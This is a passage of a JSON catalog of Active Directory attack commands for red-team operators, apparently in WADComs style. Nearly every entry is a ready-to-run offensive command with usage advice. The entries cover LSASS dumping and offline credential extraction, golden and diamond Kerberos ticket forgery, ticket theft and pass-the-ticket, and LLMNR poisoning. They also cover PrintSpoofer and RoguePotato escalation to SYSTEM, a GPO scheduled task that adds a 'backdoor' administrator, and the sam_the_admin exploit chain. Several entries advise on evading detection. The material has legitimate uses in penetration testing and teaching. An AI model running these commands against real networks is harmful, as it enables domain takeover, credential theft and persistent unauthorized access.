fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-GetDomainObjectAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GetDomainObjectAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }","description":"Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:PowerView-GPOLocalGroup","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-GPOLocalGroup","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators","description":"Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993"],"added":true},{"id":"wadcoms:PowerView-InterestingDomainAcl","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InterestingDomainAcl","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Privilege Escalation"],"nativeCategory":["Discovery","PrivEsc"],"command":"Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n ? { $_.IdentityReferenceName -eq 'john' } |\n select ObjectDN, ActiveDirectoryRights, IdentityReferenceName","description":"Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://www.thehacker.recipes/ad/movement/dacl/","https://wald0.com/?p=112"],"added":true},{"id":"wadcoms:PowerView-InvokeUserHunter","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-InvokeUserHunter","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery","Lateral Movement"],"nativeCategory":["Discovery","Lateral Movement"],"command":"Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth","description":"Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["SMB"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PowerView-Kerberoastable-SPN","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-Kerberoastable-SPN","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt","description":"PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt","mitre":[],"requires":["PowerShell"],"services":["LDAP","Kerberos"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"added":true},{"id":"wadcoms:PowerView-SetDomainObjectOwner","toolId":"wadcoms:PowerView","toolName":"PowerView","name":"PowerView-SetDomainObjectOwner","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Persistence"],"nativeCategory":["PrivEsc","Persistence"],"command":"Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All","description":"Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins","mitre":[],"requires":["PowerShell"],"services":["LDAP"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/"],"added":true},{"id":"wadcoms:pre2k-Auth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Authenticated Enumeration","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save","description":"In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:pre2k-Unauth","toolId":"wadcoms:pre2k","toolName":"pre2k","name":"pre2k Unauthenticated Spray","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Discovery"],"nativeCategory":["Credential Access","Discovery"],"command":"pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save","description":"pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt","mitre":[],"requires":["No_Creds"],"services":["Kerberos","LDAP"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:PrinterBug-printerbug","toolId":"wadcoms:PrinterBug","toolName":"PrinterBug","name":"PrinterBug-printerbug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2","description":"printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["RPC","NTLM"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"added":true},{"id":"wadcoms:PrintSpoofer-SeImpersonate","toolId":"wadcoms:PrintSpoofer","toolName":"PrintSpoofer","name":"PrintSpoofer-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"","description":"PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege","mitre":[],"requires":["Shell"],"services":["RPC"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Procdump-LSASS","toolId":"wadcoms:Procdump","toolName":"Procdump","name":"Procdump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp","description":"Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:pyGPOAbuse-ScheduledTask","toolId":"wadcoms:pyGPOAbuse","toolName":"pyGPOAbuse","name":"pyGPOAbuse-ScheduledTask","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n -dc-ip 10.10.10.1 \\\n -taskname \"SecurityUpdate\" \\\n -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1","description":"pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1","mitre":["T1484.001"],"requires":["Username","Password","Hash"],"services":["LDAP","SMB"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"added":true},{"id":"wadcoms:Pypykatz-Minidump","toolId":"wadcoms:Pypykatz","toolName":"Pypykatz","name":"Pypykatz-Minidump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"pypykatz lsa minidump lsass.dmp -o output.txt","description":"Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Responder-Poisoning","toolId":"wadcoms:Responder","toolName":"Responder","name":"Responder-Poisoning","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Collection","Execution"],"nativeCategory":["Credential Access","Collection","Exploitation"],"command":"# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv","description":"Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt","mitre":["T1557.001"],"requires":["No_Creds"],"services":["NTLM","SMB"],"references":["https://github.com/lgandx/Responder","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"added":true},{"id":"wadcoms:RoguePotato-SeImpersonate","toolId":"wadcoms:RoguePotato","toolName":"RoguePotato","name":"RoguePotato-SeImpersonate","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999","description":"RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM","RPC"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"added":true},{"id":"wadcoms:Rubeus-Describe","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Describe","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi","description":"Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-DiamondTicket","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-DiamondTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion","Execution"],"nativeCategory":["Persistence","Defense Evasion","Exploitation"],"command":"# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap","description":"Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local","mitre":[],"requires":["AES_Key","Username","Password"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond"],"added":true},{"id":"wadcoms:Rubeus-Dump","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Dump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap","description":"Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-GoldenTicket-AES","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-GoldenTicket-AES","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap","description":"Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:Rubeus-Harvest","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Harvest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection","Persistence"],"nativeCategory":["Credential Access","Collection","Persistence"],"command":"# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap","description":"Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-Monitor","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Monitor","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john /nowrap","description":"Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john","mitre":["T1558"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://attack.mitre.org/techniques/T1558/"],"added":true},{"id":"wadcoms:Rubeus-OverPassTheHash","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-OverPassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Credential Access"],"nativeCategory":["Lateral Movement","Credential Access"],"command":"# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap","description":"Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["AES_Key","Username"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Ptt","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Ptt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement","Defense Evasion"],"nativeCategory":["Lateral Movement","Defense Evasion"],"command":"# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7","description":"Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":[],"requires":["TGT"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Rubeus-Renew","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-Renew","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Credential Access"],"nativeCategory":["Persistence","Credential Access"],"command":"# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap","description":"Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket"],"added":true},{"id":"wadcoms:Rubeus-TgtDeleg","toolId":"wadcoms:Rubeus","toolName":"Rubeus","name":"Rubeus-TgtDeleg","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap","description":"Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local","mitre":[],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/GhostPack/Rubeus","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:sam-the-admin","toolId":"wadcoms:sam","toolName":"sam","name":"sam_the_admin (sAMAccountName Spoofing)","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Credential Access"],"nativeCategory":["PrivEsc","Exploitation","Credential Access"],"command":"# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump","description":"WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special 